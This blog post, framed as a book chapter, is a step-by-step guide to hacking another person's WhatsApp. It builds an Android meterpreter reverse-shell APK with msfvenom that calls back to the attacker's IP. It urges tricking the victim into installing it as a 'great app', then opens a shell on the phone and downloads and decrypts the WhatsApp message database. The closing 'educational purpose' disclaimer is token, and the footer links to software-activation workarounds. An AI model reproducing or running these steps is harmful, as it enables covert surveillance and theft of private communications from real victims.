How to Hack Whatsapp Account : Educational purpose

You need an installed Kali Linux on you computer machine.I have already written a book
on "WiFi Hacking" in which i have mentioned all step by step Guide (with photos) that
how you can install Kali Linux on your PC which includes direct install,running live and
running in VmWare workstation or virtual box(which is recommended if you are newbie in
hacking field)So, I am not Mentioning that again it will only increase the length of book so
i will move straight forward to steps that how to hack Someone's whats app account,and of
course You need zero knowledge of Kali Linux because i will be explaining step-by-step as
we move forward.AND THE MOST IMPORTANT YOU AND VICTIM MUST BE ON
SAME WIFI NETWORK.Oh- i forget to tell that you need an sharp brain too(LOL)!

1.           Fire up Kali Linux,open terminal and write the
following code

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xx.xxx LPORT=4444 R > andro.apk

"Replace xxx.xx.xxx with you ip address(you can find you ipadrees by typing myip address in google search)"


2.Now our payload is created,send this payload to the victim phone
either through Dropbox or email or any of the way you are familiar with and ask
him to open it!

This is a little tricky part if your victim has trust on you you can get his phone physical touch and do all this stuff but if
not then you can fake him by telling that this is great app and you must install it all you have to do is fake it!!!

3. Now write,and wait for it to open

msfconsole

4.Now write

use multi/handler


5.Now write
set payload android/meterpreter/reverse_tcp

set LHOST xxx.xx.xxx

set LPORT 4444

exploit


6.Now victim will run the application by just clicking and it will run all the
time in background until phone restart's and you can see session opened
once application is clicked by victim


7. Now type

shell
ls

8.Now you can see all the folders in your root folder of android mobile


9.Now type

cd sdcard
ls


10.Now locate to WhatsApp Folder and type

cd WhatsApp
ls

11.             Now you are in whatsapp folder of victim mobile phone
Now type

cd Databases
ls

12.Now you can see backup of messages

"BOOM" you are On now you can download them by
typing this -

 download FILENAME..db.crypt12
  
13.You can download all files by typing the above command and then close
the session and turn everything off once you got the databse.db.crypt file


14.          Now move on to your windows OS and download whatsapp
viewer from github or from the link down below

https://github.com/andreas-mausch/whatsapp-

viewer/releases/tag/v1.9

15.Once you have downloaded Whatsapp viewer and you have encrypted
messages as well we can read all the messages by decrypting them

16.Open whats app viewer navigate to file and choose your decryption
 method

17.           Now navigate to the encrypted file and select that file to decrypt
it!!


18.once it is decrypted it will create a message.decryption file in you
folder where the encypted messages are


19.Now click on file again and choose open and choose the
message.decryption file

20.Now file will be opened and you can see messages



IF this encryption to decryption method not worked for you or you can't understand it you can watch videos on YouTube searching for "how to decrypt whatsapp messages"

ALTHOUGH THERE ARE MANY WAYS IN WHICH HACKING
 PREVAILS IN THE WORLD BUT THE MOST SAFEST AND MOST
WORKED METHOD IS BY KALI LINUX OS WHICH KEEPS US
ANONYMOUS IN MOST OF CASES AND GIVES US TOOL TO BE
ANONYMOUS I HAVE MENTIONED 

please do not hack anyone without his/her permission all i explained in this book is for educational purpose



SO DON'T BE A FOOL AND ACT SMARTLY

Popular posts from this blog

Activating all versions of Windows Server without a product key

How to Activate Microsoft Office 2010 without Product Key for Free

How to Troubleshoot “connection to KMS server failed” error | KMS Server failed [Solved]